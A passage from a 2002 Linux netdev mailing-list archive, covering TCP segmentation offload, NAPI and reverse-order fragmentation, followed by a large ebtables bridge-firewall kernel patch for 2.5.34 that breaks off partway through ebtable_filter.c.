was also great to see the de-mything of some of the old assumptions of the world. BTW, TSO is not as intelligent as what you are suggesting. If i am not mistaken you are not only suggesting fragmentation and assembly at that level; you are also suggesting retransmits at the NIC. This could be dangerous for practical reasons (changes in TCP congestion control algorithms etc). TSO, as was pointed out in earlier emails, is just a dumb sender of packets. I think even fragmentation is a misnomer. Essentially you shove a huge buffer to the NIC and it breaks it into MTU sized packets for you and sends them.
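To make the "dumb sender" description above concrete, here is a minimal userspace sketch in C of the splitting step only. It assumes a fixed per-packet payload limit (called mss here) and ignores header replication, checksums and everything else the hardware does. The names tso_split and struct segment are made up for illustration; they are not part of the kernel or the e1000 driver.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical descriptor for one on-the-wire packet (illustration only). */
struct segment {
    size_t offset;  /* where this packet's payload starts in the big buffer */
    size_t len;     /* number of payload bytes carried by this packet */
};

/*
 * Split a payload of total_len bytes into pieces of at most mss bytes.
 * Fills in at most max_segs descriptors in out[] and returns how many
 * segments the payload needs in total (which may exceed max_segs).
 */
size_t tso_split(size_t total_len, size_t mss,
                 struct segment *out, size_t max_segs)
{
    size_t n = 0;
    size_t off = 0;

    assert(mss > 0);  /* a zero-sized packet limit would never make progress */

    while (off < total_len) {
        size_t len = total_len - off;

        if (len > mss)
            len = mss;          /* full-sized packet */
        if (n < max_segs) {
            out[n].offset = off;
            out[n].len = len;
        }
        n++;
        off += len;
    }
    return n;
}
```

For example, a 4000 byte buffer with a 1460 byte payload limit comes out as three packets of 1460, 1460 and 1080 bytes. Nothing here knows about retransmits or congestion control, which is the point being made about TSO.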
In regards to the receive side CPU utilization improvements: I think that NAPI does a good job at least in getting rid of the biggest offender -- interrupt overload. Also, with NAPI having got rid of intermediate queues to the socket level, zero copy receive should be relatively easy to add, but there are no capable NICs in existence (well, ok, not counting the TIGONII/acenic that you can hack, and the fact that the tigon 2 is EOL doesn't help other than just for experiments). I don't think there's any NIC that can offload reassembly; that might not be such a bad idea. Are you still continuing work on this? cheers, jamal From todd@osogrande.com Thu Sep 12 06:55:06 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 06:55:13 -0700 (PDT) Received: from cochiti.nm.org (cochiti.nm.org [129.121.1.13]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CDt6tG000561 for ; Thu, 12 Sep 2002 06:55:06 -0700 Received: (qmail 40798 invoked from network); 12 Sep 2002 13:59:44 -0000 Received: from unknown (HELO gallinas) (129.121.5.22) by cochiti.nm.org with SMTP; 12 Sep 2002 13:59:44 -0000 Date: Thu, 12 Sep 2002 07:57:04 -0600 (MDT) From: Todd Underwood X-X-Sender: todd@gp To: jamal cc: "David S. Miller" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" , patricia gilfeather Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 160 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: todd@osogrande.com Precedence: bulk X-list: netdev jamal, > Good work. The first time i have seen someone say Linux's way of > reverse order is a GoodThing(tm). It was also great to see de-mything > some of the old assumption of the world. thanks.
although i'd love to take credit, i don't think that the reverse-order fragmentation appreciation is all that original: who wouldn't want their data structure size determined up-front? :-) (not to mention getting header-overwriting for free as part of the single copy.) > BTW, TSO is not a intelligent as what you are suggesting. > If i am not mistaken you are not only suggesting fragmentation and > assembly at that level you are also suggesting retransmits at the NIC. > This could be dangerous for practical reasons (changes in TCP congestion > control algorithms etc). TSO as was pointed in earlier emails is just a > dumb sender of packets. I think even fragmentation is a misnomer. > Essentially you shove a huge buffer to the NIC and it breaks it into MTU > sized packets for you and sends them. the biggest problem with our approach is that it is extremely difficult to mix two very different kinds of workloads together: the regular server-on-the-internet workload (SOI) and the large-cluster-member workload (LCM). in the former case, SOI, you get dropped packets, fragments, no fragments, out of order fragments, etc. in the LCM case you basically never get any of that stuff--you're on a closed network with 1000-10000 of your closest cluster friends and that's just what you're doing. no fragments (unless you put them there), no out of order fragments (unless you send them) and basically no dropped packets ever. obviously, if you can assume conditions like that, you can do things like: only reassemble fragments in reverse order since you know you'll only send them that way, e.g. > In regards to the receive side CPU utilization improvements: I think > that NAPI does a good job at least in getting ridding of the biggest > offender -- interupt overload.
Also with NAPI also having got rid of > intermidiate queues to the socket level, facilitating of zero copy receive > should be relatively easy to add but there are no capable NICs in > existence (well, ok not counting the TIGONII/acenic that you can hack > and the fact that the tigon 2 is EOL doesnt help other than just for > experiments). I dont think theres any NIC that can offload reassembly; > that might not be such a bad idea. i've done some reading about NAPI just recently (somehow i missed the splash when it came out). the two things i like about it are the hardware independent interrupt mitigation technique and using the DMA buffers as a receive backlog. i'm concerned about the numbers posted by ibm folx recently showing a slowdown under some conditions using NAPI and need to read the rest of that discussion. we are definitely aware of the fact that the more you want to put on the NIC, the more the NIC will have to do (and the more expensive it will have to be). right now the NICs that people are developing on are the TigonII/III and, even more closed/proprietary, the Myrinet NICs. i would love to have a <$200 NIC with open firmware and a CPU/memory so that we could offload some more of this functionality (where it makes sense). > > Are you still continuing work on this? > definitely! we were just talking about some of these issues yesterday (and trying to find hardware spec info on the web for the e1000 platform to see what else they might be able to do). patricia gilfeather is working on finding parts of TCP that are separable from the rest of TCP, but the problems you raise are serious: it would have to be on an application-specific and socket-specific basis, so that the app would *know* that functionality (like acks for synchronization packets or whatever) was being offloaded. the biggest difference in our perspective, versus the common kernel developers, is that we're still looking for ways to get the OS out of the way of the applications.
if we can do large data transfers (with pre-posted receives and pre-posted memory allocation, obviously) directly from the nic into application memory and have a clean, relatively simple and standard api to do that, we avoid all of the interrupt mitigation techniques and save hugely on context switching overhead. this may now be off-topic for linux-kernel and i'd be happy to chat further in private email if others are getting bored :-). > cheers, > jamal t. -- todd underwood, vp & cto oso grande technologies, inc. todd@osogrande.com "Those who give up essential liberties for temporary safety deserve neither liberty nor safety." - Benjamin Franklin From alan@lxorguk.ukuu.org.uk Thu Sep 12 07:06:48 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 07:06:53 -0700 (PDT) Received: from irongate.swansea.linux.org.uk (pc1-cwma1-5-cust128.swa.cable.ntl.com [80.5.120.128]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CE6ktG001413 for ; Thu, 12 Sep 2002 07:06:47 -0700 Received: from irongate.swansea.linux.org.uk (localhost [127.0.0.1]) by irongate.swansea.linux.org.uk (8.12.5/8.12.5) with ESMTP id g8CEBQsi005751; Thu, 12 Sep 2002 15:11:27 +0100 Received: (from alan@localhost) by irongate.swansea.linux.org.uk (8.12.5/8.12.5/Submit) id g8CEBOo5005749; Thu, 12 Sep 2002 15:11:24 +0100 X-Authentication-Warning: irongate.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: Alan Cox To: Todd Underwood Cc: jamal , "David S. 
Miller" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" , patricia gilfeather In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-7) Date: 12 Sep 2002 15:11:23 +0100 Message-Id: <1031839883.2994.84.camel@irongate.swansea.linux.org.uk> Mime-Version: 1.0 X-archive-position: 161 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Thu, 2002-09-12 at 14:57, Todd Underwood wrote: > thanks. although i'd love to take credit, i don't think that the > reverse-order fragmentation appreciation is all that original: who > wouldn't want their data sctructure size determined up-front? :-) (not to > mention getting header-overwriting for-free as part of the single copy. As far as I am aware it was original when Linux first did it (and we broke cisco pix, some boot proms, some sco in the process). Credit goes to Arnt Gulbrandsen probably better known nowdays for his work on Qt From todd-lkml@osogrande.com Thu Sep 12 07:39:27 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 07:39:33 -0700 (PDT) Received: from puerco.nm.org (puerco.nm.org [129.121.1.22]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CEdQtG003147 for ; Thu, 12 Sep 2002 07:39:27 -0700 Received: (qmail 75094 invoked from network); 12 Sep 2002 14:40:19 -0000 Received: from unknown (HELO gallinas) (129.121.5.22) by puerco.nm.org with SMTP; 12 Sep 2002 14:40:19 -0000 Date: Thu, 12 Sep 2002 08:41:25 -0600 (MDT) From: todd-lkml@osogrande.com X-X-Sender: todd@gp Reply-To: linux-kernel@vger.kernel.org To: Alan Cox cc: jamal , "David S. 
Miller" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" , patricia gilfeather Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <1031839883.2994.84.camel@irongate.swansea.linux.org.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 162 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: todd-lkml@osogrande.com Precedence: bulk X-list: netdev alan, good to know. it's a nice piece of engineering. it's useful to note that linux has such a long and rich history of breaking de-facto standards in order to make things work better. t. On 12 Sep 2002, Alan Cox wrote: > On Thu, 2002-09-12 at 14:57, Todd Underwood wrote: > > thanks. although i'd love to take credit, i don't think that the > > reverse-order fragmentation appreciation is all that original: who > > wouldn't want their data sctructure size determined up-front? :-) (not to > > mention getting header-overwriting for-free as part of the single copy. > > As far as I am aware it was original when Linux first did it (and we > broke cisco pix, some boot proms, some sco in the process). Credit goes > to Arnt Gulbrandsen probably better known nowdays for his work on Qt > -- todd underwood, vp & cto oso grande technologies, inc. todd@osogrande.com "Those who give up essential liberties for temporary safety deserve neither liberty nor safety." 
- Benjamin Franklin From bart.de.schuymer@pandora.be Thu Sep 12 10:01:13 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 10:01:23 -0700 (PDT) Received: from tartarus.telenet-ops.be (tartarus.telenet-ops.be [195.130.132.34]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CH1BtG008812 for ; Thu, 12 Sep 2002 10:01:12 -0700 Received: from localhost (localhost.localdomain [127.0.0.1]) by tartarus.telenet-ops.be (Postfix) with SMTP id DD6C9DCCDA; Thu, 12 Sep 2002 19:05:43 +0200 (CEST) Received: from linux (D5762B32.kabel.telenet.be [213.118.43.50]) by tartarus.telenet-ops.be (Postfix) with ESMTP id CAB82DBD7C; Thu, 12 Sep 2002 19:05:31 +0200 (CEST) Content-Type: text/plain; charset="iso-8859-1" From: Bart De Schuymer Subject: [PATCH] ebtables - Ethernet bridge tables, for 2.5.34 Date: Thu, 12 Sep 2002 19:07:12 +0200 X-Mailer: KMail [version 1.4] To: netdev@oss.sgi.com, linux-net@vger.kernel.org MIME-Version: 1.0 Message-Id: <200209121907.12936.bart.de.schuymer@pandora.be> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id g8CH1BtG008812 X-archive-position: 163 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bart.de.schuymer@pandora.be Precedence: bulk X-list: netdev Hello list, I sent this message to lkml too, but without the actual patch. I hope I'm allowed to send the full patch here. It's quite large. Ebtables is a project similar to iptables, but working on the bridge netfilter hooks. It allows for a basic transparent firewall, making a brouter and doing MAC source address and destination address manipulation. The firewall part has currently modules for basic IP filtering, 802.1q filtering, ARP filtering, logging and a mark match/target. Ebtables has been under development for over 1.5 year and has more than 100 users, I think. 
You can also download the patch here: http://users.pandora.be/bart.de.schuymer/ebtables/v2.0/ebtables-v2.0_vs_2.5.34.diff http://users.pandora.be/bart.de.schuymer/ebtables/v2.0/ebtables-v2.0_vs_2.5.34.diff.gz For more information, see http://users.pandora.be/bart.de.schuymer/ebtables/ There is an ebtables hacking howto, some basic examples and some real life examples from users. And ofcourse the userspace program. This is the first time I'm submitting a large patch, so feel free to rant if I'm doing something wrong... Here it goes: ebtables-v2.0 - 11 September 2002 Bart De Schuymer ****** Add ebtables project info --- linux-2.5.34/MAINTAINERS Mon Sep 9 19:35:13 2002 +++ linux-2.5.34-ebtables/MAINTAINERS Wed Sep 11 23:06:55 2002 @@ -531,6 +531,14 @@ M: mike@i-Connect.Net L: linux-eata@i-connect.net, linux-scsi@vger.kernel.org S: Maintained +EBTABLES +P: Bart De Schuymer +M: bart.de.schuymer@pandora.be +L: ebtables-user@lists.sourceforge.net +L: ebtables-devel@lists.sourceforge.net +W: http://ebtables.sourceforge.net/ +S: Maintained + EEPRO100 NETWORK DRIVER P: Andrey V. Savochkin M: saw@saw.sw.com.sg ****** Clear nf_debug, we will be dealing with different netfilter hooks: the bridge hooks. 
--- linux-2.5.34/net/bridge/br_forward.c Mon Sep 9 19:35:07 2002 +++ linux-2.5.34-ebtables/net/bridge/br_forward.c Wed Sep 11 23:06:55 2002 @@ -49,6 +49,9 @@ static int __br_forward_finish(struct sk static void __br_deliver(struct net_bridge_port *to, struct sk_buff *skb) { skb->dev = to->dev; +#ifdef CONFIG_NETFILTER_DEBUG + skb->nf_debug = 0; +#endif NF_HOOK(PF_BRIDGE, NF_BR_LOCAL_OUT, skb, NULL, skb->dev, __br_forward_finish); } ****** modification for brouter support --- linux-2.5.34/net/bridge/br_private.h Mon Sep 9 19:35:05 2002 +++ linux-2.5.34-ebtables/net/bridge/br_private.h Wed Sep 11 23:06:55 2002 @@ -166,7 +166,7 @@ extern void br_get_port_ifindices(struct int *ifindices); /* br_input.c */ -extern void br_handle_frame(struct sk_buff *skb); +extern int br_handle_frame(struct sk_buff *skb); /* br_ioctl.c */ extern void br_call_ioctl_atomic(void (*fn)(void)); ****** modification for brouter support --- linux-2.5.34/include/linux/if_bridge.h Mon Sep 9 19:35:11 2002 +++ linux-2.5.34-ebtables/include/linux/if_bridge.h Wed Sep 11 23:06:55 2002 @@ -102,8 +102,13 @@ struct net_bridge; struct net_bridge_port; extern int (*br_ioctl_hook)(unsigned long arg); -extern void (*br_handle_frame_hook)(struct sk_buff *skb); - +extern int (*br_handle_frame_hook)(struct sk_buff *skb); +#if defined(CONFIG_BRIDGE_EBT_BROUTE) || \ + defined(CONFIG_BRIDGE_EBT_BROUTE_MODULE) +extern unsigned int (*broute_decision) (unsigned int hook, struct sk_buff **pskb, + const struct net_device *in, const struct net_device *out, + int (*okfn)(struct sk_buff *)); +#endif #endif #endif ****** modification for brouter support br_handle_frame_hook return non-zero if the frame has to be routed, else the frame has been bridged. 
--- linux-2.5.34/net/core/dev.c Mon Sep 9 19:35:12 2002 +++ linux-2.5.34-ebtables/net/core/dev.c Wed Sep 11 23:06:55 2002 @@ -1395,7 +1395,7 @@ void net_call_rx_atomic(void (*fn)(void) } #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) -void (*br_handle_frame_hook)(struct sk_buff *skb) = NULL; +int (*br_handle_frame_hook)(struct sk_buff *skb) = NULL; #endif static __inline__ int handle_bridge(struct sk_buff *skb, @@ -1412,7 +1412,6 @@ static __inline__ int handle_bridge(stru } } - br_handle_frame_hook(skb); return ret; } @@ -1473,7 +1472,11 @@ int netif_receive_skb(struct sk_buff *sk #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) if (skb->dev->br_port && br_handle_frame_hook) { - return handle_bridge(skb, pt_prev); + int ret; + + ret = handle_bridge(skb, pt_prev); + if (br_handle_frame_hook(skb) == 0) + return ret; } #endif ****** modification for brouter support + clear nf_debug br_handle_frame_hook calls broute_decision(), which traverses the ebtables brouting table to get the decision to bridge or route the frame. Return value -1 means route, 0 means the frame has been bridged. 
--- linux-2.5.34/net/bridge/br_input.c Mon Sep 9 19:35:06 2002 +++ linux-2.5.34-ebtables/net/bridge/br_input.c Wed Sep 11 23:06:55 2002 @@ -19,11 +19,18 @@ #include #include #include "br_private.h" +#if defined(CONFIG_BRIDGE_EBT_BROUTE) || \ + defined(CONFIG_BRIDGE_EBT_BROUTE_MODULE) +#include +#endif unsigned char bridge_ula[6] = { 0x01, 0x80, 0xc2, 0x00, 0x00, 0x00 }; static int br_pass_frame_up_finish(struct sk_buff *skb) { +#ifdef CONFIG_NETFILTER_DEBUG + skb->nf_debug = 0; +#endif netif_rx(skb); return 0; @@ -112,7 +119,7 @@ err_nolock: return 0; } -void br_handle_frame(struct sk_buff *skb) +int br_handle_frame(struct sk_buff *skb) { struct net_bridge *br; unsigned char *dest; @@ -146,25 +153,32 @@ void br_handle_frame(struct sk_buff *skb goto handle_special_frame; if (p->state == BR_STATE_FORWARDING) { +#if defined(CONFIG_BRIDGE_EBT_BROUTE) || \ + defined(CONFIG_BRIDGE_EBT_BROUTE_MODULE) + if (broute_decision && broute_decision(NF_BR_BROUTING, &skb, + skb->dev, NULL, NULL) == NF_DROP) + return -1; +#endif NF_HOOK(PF_BRIDGE, NF_BR_PRE_ROUTING, skb, skb->dev, NULL, br_handle_frame_finish); read_unlock(&br->lock); - return; + return 0; } err: read_unlock(&br->lock); err_nolock: kfree_skb(skb); - return; + return 0; handle_special_frame: if (!dest[5]) { br_stp_handle_bpdu(skb); read_unlock(&br->lock); - return; + return 0; } kfree_skb(skb); read_unlock(&br->lock); + return 0; } ****** broute_decision is defined here. 
--- linux-2.5.34/net/bridge/br.c Mon Sep 9 19:35:04 2002 +++ linux-2.5.34-ebtables/net/bridge/br.c Wed Sep 11 23:06:55 2002 @@ -28,6 +28,14 @@ #include "../atm/lec.h" #endif +#if defined(CONFIG_BRIDGE_EBT_BROUTE) || \ + defined(CONFIG_BRIDGE_EBT_BROUTE_MODULE) +unsigned int (*broute_decision) (unsigned int hook, struct sk_buff **pskb, + const struct net_device *in, + const struct net_device *out, + int (*okfn)(struct sk_buff *)) = NULL; +#endif + void br_dec_use_count() { MOD_DEC_USE_COUNT; @@ -73,6 +81,11 @@ static void __exit br_deinit(void) br_fdb_put_hook = NULL; #endif } + +#if defined(CONFIG_BRIDGE_EBT_BROUTE) || \ + defined(CONFIG_BRIDGE_EBT_BROUTE_MODULE) +EXPORT_SYMBOL(broute_decision); +#endif module_init(br_init) module_exit(br_deinit) ****** br.o may have to export broute_decision. Add the bridge/netfilter directory. --- linux-2.5.34/net/bridge/Makefile Mon Sep 9 19:35:21 2002 +++ linux-2.5.34-ebtables/net/bridge/Makefile Wed Sep 11 23:06:55 2002 @@ -2,10 +2,17 @@ # Makefile for the IEEE 802.1d ethernet bridging layer. # +ifneq ($(CONFIG_BRIDGE_EBT_BROUTE),n) +ifneq ($(CONFIG_BRIDGE_EBT_BROUTE),) +export-objs := br.o +endif +endif + obj-$(CONFIG_BRIDGE) += bridge.o bridge-objs := br.o br_device.o br_fdb.o br_forward.o br_if.o br_input.o \ br_ioctl.o br_notify.o br_stp.o br_stp_bpdu.o \ br_stp_if.o br_stp_timer.o +obj-$(CONFIG_BRIDGE_EBT) += netfilter/ include $(TOPDIR)/Rules.make ****** Add the NF_BR_BROUTING "hook" --- linux-2.5.34/include/linux/netfilter_bridge.h Mon Sep 9 19:35:12 2002 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge.h Wed Sep 11 23:06:55 2002 @@ -18,7 +18,18 @@ #define NF_BR_LOCAL_OUT 3 /* Packets about to hit the wire. 
*/ #define NF_BR_POST_ROUTING 4 -#define NF_BR_NUMHOOKS 5 +/* Not really a hook, but used for the ebtables broute table */ +#define NF_BR_BROUTING 5 +#define NF_BR_NUMHOOKS 6 +enum nf_br_hook_priorities { + NF_BR_PRI_FIRST = INT_MIN, + NF_BR_PRI_FILTER_BRIDGED = -200, + NF_BR_PRI_FILTER_OTHER = 200, + NF_BR_PRI_NAT_DST_BRIDGED = -300, + NF_BR_PRI_NAT_DST_OTHER = 100, + NF_BR_PRI_NAT_SRC = 300, + NF_BR_PRI_LAST = INT_MAX, +}; #endif ****** Include the ebtables Config.in --- linux-2.5.34/net/Config.in Mon Sep 9 19:35:05 2002 +++ linux-2.5.34-ebtables/net/Config.in Wed Sep 11 23:06:55 2002 @@ -65,6 +65,9 @@ if [ "$CONFIG_DECNET" != "n" ]; then source net/decnet/Config.in fi dep_tristate '802.1d Ethernet Bridging' CONFIG_BRIDGE $CONFIG_INET +if [ "$CONFIG_BRIDGE" != "n" -a "$CONFIG_NETFILTER" != "n" ]; then + source net/bridge/netfilter/Config.in +fi if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then tristate 'CCITT X.25 Packet Layer (EXPERIMENTAL)' CONFIG_X25 tristate 'LAPB Data Link Driver (EXPERIMENTAL)' CONFIG_LAPB ****** Now follow all the new files, without much comment. ebtables is modular like iptables, currently there are 3 tables: broute, nat and filter. There are some mark modules and target modules too. Also one watcher module, the log module. --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/Makefile Wed Sep 11 23:06:55 2002 @@ -0,0 +1,20 @@ +# +# Makefile for the netfilter modules for Link Layer filtering on a bridge. 
+# + +export-objs := ebtables.o + +obj-$(CONFIG_BRIDGE_EBT) += ebtables.o +obj-$(CONFIG_BRIDGE_EBT_T_FILTER) += ebtable_filter.o +obj-$(CONFIG_BRIDGE_EBT_T_NAT) += ebtable_nat.o +obj-$(CONFIG_BRIDGE_EBT_BROUTE) += ebtable_broute.o +obj-$(CONFIG_BRIDGE_EBT_IPF) += ebt_ip.o +obj-$(CONFIG_BRIDGE_EBT_ARPF) += ebt_arp.o +obj-$(CONFIG_BRIDGE_EBT_VLANF) += ebt_vlan.o +obj-$(CONFIG_BRIDGE_EBT_MARKF) += ebt_mark_m.o +obj-$(CONFIG_BRIDGE_EBT_LOG) += ebt_log.o +obj-$(CONFIG_BRIDGE_EBT_SNAT) += ebt_snat.o +obj-$(CONFIG_BRIDGE_EBT_DNAT) += ebt_dnat.o +obj-$(CONFIG_BRIDGE_EBT_REDIRECT) += ebt_redirect.o +obj-$(CONFIG_BRIDGE_EBT_MARK_T) += ebt_mark.o +include $(TOPDIR)/Rules.make --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/Config.in Wed Sep 11 23:06:55 2002 @@ -0,0 +1,17 @@ +# +# Bridge netfilter configuration +# +dep_tristate ' Bridge: ebtables' CONFIG_BRIDGE_EBT $CONFIG_BRIDGE +dep_tristate ' ebt: filter table support' CONFIG_BRIDGE_EBT_T_FILTER $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: nat table support' CONFIG_BRIDGE_EBT_T_NAT $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: broute table support' CONFIG_BRIDGE_EBT_BROUTE $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: log support' CONFIG_BRIDGE_EBT_LOG $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: IP filter support' CONFIG_BRIDGE_EBT_IPF $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: ARP filter support' CONFIG_BRIDGE_EBT_ARPF $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: 802.1Q VLAN filter support (EXPERIMENTAL)' CONFIG_BRIDGE_EBT_VLANF $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: mark filter support' CONFIG_BRIDGE_EBT_MARKF $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: snat target support' CONFIG_BRIDGE_EBT_SNAT $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: dnat target support' CONFIG_BRIDGE_EBT_DNAT $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: redirect target support' CONFIG_BRIDGE_EBT_REDIRECT $CONFIG_BRIDGE_EBT +dep_tristate ' ebt: mark target support' CONFIG_BRIDGE_EBT_MARK_T $CONFIG_BRIDGE_EBT + --- /dev/null Thu Aug 24 11:00:32 2000 +++ 
linux-2.5.34-ebtables/net/bridge/netfilter/Config.help Wed Sep 11 23:06:55 2002 @@ -0,0 +1,105 @@ +CONFIG_BRIDGE_EBT + ebtables is an extendable frame filtering system for the Linux + Ethernet bridge. Its usage and implementation is very similar to that + of iptables. + The difference is that ebtables works on the Link Layer, while iptables + works on the Network Layer. ebtables can filter all frames that come + into contact with a logical bridge device. + Apart from filtering, ebtables also allows MAC source and destination + alterations (we call it MAC SNAT and MAC DNAT) and also provides + functionality for making Linux a brouter. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_T_FILTER + The ebtables filter table is used to define frame filtering rules at + local input, forwarding and local output. See the man page for + ebtables(8). + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_T_NAT + The ebtables nat table is used to define rules that alter the MAC + source address (MAC SNAT) or the MAC destination address (MAC DNAT). + See the man page for ebtables(8). + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_BROUTE + The ebtables broute table is used to define rules that decide between + bridging and routing frames, giving Linux the functionality of a + brouter. See the man page for ebtables(8) and examples on the ebtables + website. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_LOG + This option adds the log target, that you can use in any rule in + any ebtables table. It records the frame header to the syslog. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_IPF + This option adds the IP match, which allows basic IP header field + filtering. 
+ + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_ARPF + This option adds the ARP match, which allows ARP and RARP header field + filtering. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_VLANF + This option adds the 802.1Q vlan match, which allows the filtering of + 802.1Q vlan fields. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_MARKF + This option adds the mark match, which allows matching frames based on + the 'nfmark' value in the frame. This can be set by the mark target. + This value is the same as the one used in the iptables mark match and + target. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_SNAT + This option adds the MAC SNAT target, which allows altering the MAC + source address of frames. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_DNAT + This option adds the MAC DNAT target, which allows altering the MAC + destination address of frames. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_REDIRECT + This option adds the MAC redirect target, which allows altering the MAC + destination address of a frame to that of the device it arrived on. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. + +CONFIG_BRIDGE_EBT_MARK_T + This option adds the mark target, which allows marking frames by + setting the 'nfmark' value in the frame. + This value is the same as the one used in the iptables mark match and + target. + + If you want to compile it as a module, say M here and read + . If unsure, say `N'. 
--- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/net/bridge/netfilter/ebtable_filter.c Wed Sep 11 23:06:55 2002 @@ -0,0 +1,90 @@ +/* + * ebtable_filter + * + * Authors: + * Bart De Schuymer + * + * April, 2002 + * + */ + +#include +#include + +#define FILTER_VALID_HOOKS ((1 << NF_BR_LOCAL_IN) | (1 << NF_BR_FORWARD) | \ + (1 << NF_BR_LOCAL_OUT)) + +static struct ebt_entries initial_chains[] = +{ + {0, "INPUT", 0, EBT_ACCEPT, 0}, + {0, "FORWARD", 0, EBT_ACCEPT, 0}, + {0, "OUTPUT", 0, EBT_ACCEPT, 0} +}; + +static struct ebt_replace initial_table = +{ + "filter", FILTER_VALID_HOOKS, 0, 3 * sizeof(struct ebt_entries), + { [NF_BR_LOCAL_IN]&initial_chains[0], [NF_BR_FORWARD]&initial_chains[1], + [NF_BR_LOCAL_OUT]&initial_chains[2] }, 0, NULL, (char *)initial_chains +}; + +static int check(const struct ebt_table_info *info, unsigned int valid_hooks) +{ + if (valid_hooks & ~FILTER_VALID_HOOKS) + return -EINVAL; + return 0; +} + +static struct ebt_table frame_filter = +{ + {NULL, NULL}, "filter", &initial_table, FILTER_VALID_HOOKS, + RW_LOCK_UNLOCKED, check, NULL +}; + +static unsigned int +ebt_hook (unsigned int hook, struct sk_buff **pskb, const struct net_device *in, + const struct net_device *out, int (*okfn)(struct sk_buff *)) +{ + return ebt_do_table(hook, pskb, in, out, &frame_filter); +} + +static struct nf_hook_ops ebt_ops_filter[] = { + { { NULL, NULL }, ebt_hook, PF_BRIDGE, NF_BR_LOCAL_IN, + NF_BR_PRI_FILTER_BRIDGED}, + { { NULL, NULL }, ebt_hook, PF_BRIDGE, NF_BR_FORWARD, + NF_BR_PRI_FILTER_BRIDGED}, + { { NULL, NULL }, ebt_hook, PF_BRIDGE, NF_BR_LOCAL_OUT, + NF_BR_PRI_FILTER_OTHER} +}; + +static int __init init(void) +{ + int i, j, ret; + + ret = ebt_register_table(&frame_filter); + if (ret < 0) + return ret; + for (i = 0; i < sizeof(ebt_ops_filter) / sizeof(ebt_ops_filter[0]); i++) + if ((ret = nf_register_hook(&ebt_ops_filter[i])) < 0) + goto cleanup; + return ret; +cleanup: + for (j = 0; j < i; j++) + nf_unregister_hook(&ebt_ops_filter[j]); + 
